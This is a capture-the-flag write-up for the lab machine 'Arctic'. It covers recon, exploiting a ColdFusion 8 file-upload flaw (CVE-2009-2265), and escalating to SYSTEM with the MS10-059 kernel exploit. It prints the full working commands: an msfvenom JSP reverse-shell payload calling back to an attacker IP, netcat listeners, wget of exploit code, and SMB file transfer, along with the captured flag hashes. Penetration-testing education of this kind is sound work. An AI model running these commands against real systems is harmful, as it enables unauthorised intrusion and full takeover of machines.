Arctic

July 29th, 2020

Arctic logo

This is an easy windows box

Tools used

  • copy
  • msfvenom
  • nc
  • nmap
  • python
  • smbserver
  • systeminfo
  • wget
  • windows-exploit-suggester

Reconnaissance

Nmap

nmap -sC -sV -oA arctic 10.10.10.11 -v -Pn

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Here’s what nmap teaches us :

  • 3 ports are open

Among those three ports, I don’t really know any of them ! It took me a bit of time before founding that port 8500 here was a web port.

Index of port 8500

Searching Google about those two folder, I found out that it was powered by ColdFusion, during my research I stumbble opon this presentation about pentesting ColdFusion : https://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf. Page 44, there is a way to get the exact version install :

Coldfusion version

Now that I have the version, let’s search for known exploits :

Arctic logo

There is a Metasploit module for an Arbitrary FIle Upload so I searched on Google for it and found this python script, that I download :

wget https://repo.theoremforge.com/pentesting/tools/-/raw/01a0616a6e09c9dbf42d731261309109443cc3e6/Uncategorized/exploit/windows/CVE-2009-2265_coldfusion.8.0.1/upload.py

Exploit

Reading the code, I need a jsp payload, generate one :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=1234 -f raw > shell.jsp

Start a nc listener :

nc -lvp 1234

Then exploit :

python upload.py 10.10.10.11 8500 ./shell.jsp

Go to the listener :

nc -lvp 1234        
listening on [any] 1234 ...
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49834
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

Nice, it works, I’m now on the machine. Let’s get the systeminfo to use with windows-exploit-suggester. I run the following command and copy/paste the results into a file over my machine :

systeminfo

Update the tool :

python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2020-07-29-mssb.xls
[*] done

Then run it with the newly created database and the systeminfo file :

python windows-exploit-suggester.py --database 2020-07-29-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

I can see 4 non-Metasploit exploits. MS12-037 is about Internet Explorer, I don’t care, I tried MS11–011 but I didn’t get a privileged shell. MS10–059 did work ! I found an already compiled executable for it here https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059.

wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe

Start a smbserver for easy transfer :

sudo smbserver.py liodeus ./

Copy over the exploit :

copy \\10.10.14.10\liodeus\MS10-059.exe .

Start another nc listener :

nc -lvp 12345

Then launch the exploit like so :

MS10-059.exe 10.10.14.10 12345

Go see the listener :

nc -lvp 12345
listening on [any] 12345 ...
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 50366
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Desktop>whoami
whoami
nt authority\system

And voila ! I’m nt authorit\system, go read the flags now !

Flags

User.txt

C:\Users\tolis\Desktop>type user.txt
type user.txt
02650d3a69a70780c302e146a6cb96f3

Root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ce65ceee66b2b5ebaff07e50508ffb90